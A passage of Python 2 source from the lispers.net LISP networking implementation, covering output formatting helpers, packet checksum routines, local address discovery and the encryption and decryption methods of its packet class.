ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
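#
# Doctest-style examples of the conversion (Python 2 semantics):
#
# >>> lisp_hex_string(255)
# 'ff'
# >>> lisp_hex_string(2**64 - 1)
# 'ffffffffffffffff'
#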
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
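#
# Examples of the output format for both helpers (timestamps assumed to be
# taken relative to "now"):
#
# >>> lisp_print_elapsed(time.time() - 90)
# '0:01:30'
# >>> lisp_print_future(time.time() + 3600)
# '1:00:00'
#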
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
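#
# For example; anything without the "::ffff:" prefix is passed through:
#
# >>> lisp_convert_6to4("::ffff:10.1.1.1")
# '10.1.1.1'
# >>> lisp_convert_6to4("2001:db8::1")
# '2001:db8::1'
#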
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
    # Make sure there are hex digits between dashes; otherwise it could be a
    # valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
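#
# Dotted-quad and colon-separated inputs short-circuit without a DNS query;
# hostnames fall through to the resolver (second result is host-dependent):
#
# >>> lisp_gethostbyname("10.0.0.1")
# '10.0.0.1'
# >>> lisp_gethostbyname("localhost")
# '127.0.0.1'
#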
#
# lisp_ip_checksum
#
# Input to this function is a 20-byte IPv4 header in packed form. Calculate
# the IP header checksum and place it in bytes 10 and 11 of the header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
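#
# Minimal usage sketch (field values are illustrative): build a 20-byte IPv4
# header with a zeroed checksum and let this function fill in bytes 10-11.
#
# >>> hdr = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(40), 0, 0, 64, 17, 0)
# >>> hdr += socket.inet_aton("10.0.0.1") + socket.inet_aton("10.0.0.2")
# >>> hdr = lisp_ip_checksum(hdr)
#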
#
# lisp_icmp_checksum
#
# Checksum an ICMP Destination Unreachable Too-Big message. It statically
# checksums 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Compute the IGMP checksum. This is specialized for a 12-byte IGMP query
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get an interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If the dest-MAC is not us, look at the source MAC to see if we are in a
# loopback situation, testing an application and an xTR on the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
    #endfor
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
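#
# For example:
#
# >>> lisp_is_mac_string("0050-56c0-0008")
# True
# >>> lisp_is_mac_string("0050-56c0-0008/48")
# True
# >>> lisp_is_mac_string("foo-bar")
# False
#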
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value that is an array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
        # only names with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
    # The output may span multiple lines; the first address found is returned.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
    #endfor
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#enddef
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
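#
# For instance, a lisp.config containing the line (address illustrative):
#
# rle-address = 224.1.1.1
#
# yields ["224.1.1.1"]; unicast RLEs such as 10.0.0.1 are filtered out by the
# 224-239 first-byte check above.
#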
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
        # ciphertext. Needed to interoperate with the Go implementation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
        # IV, and the ciphertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
        # Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
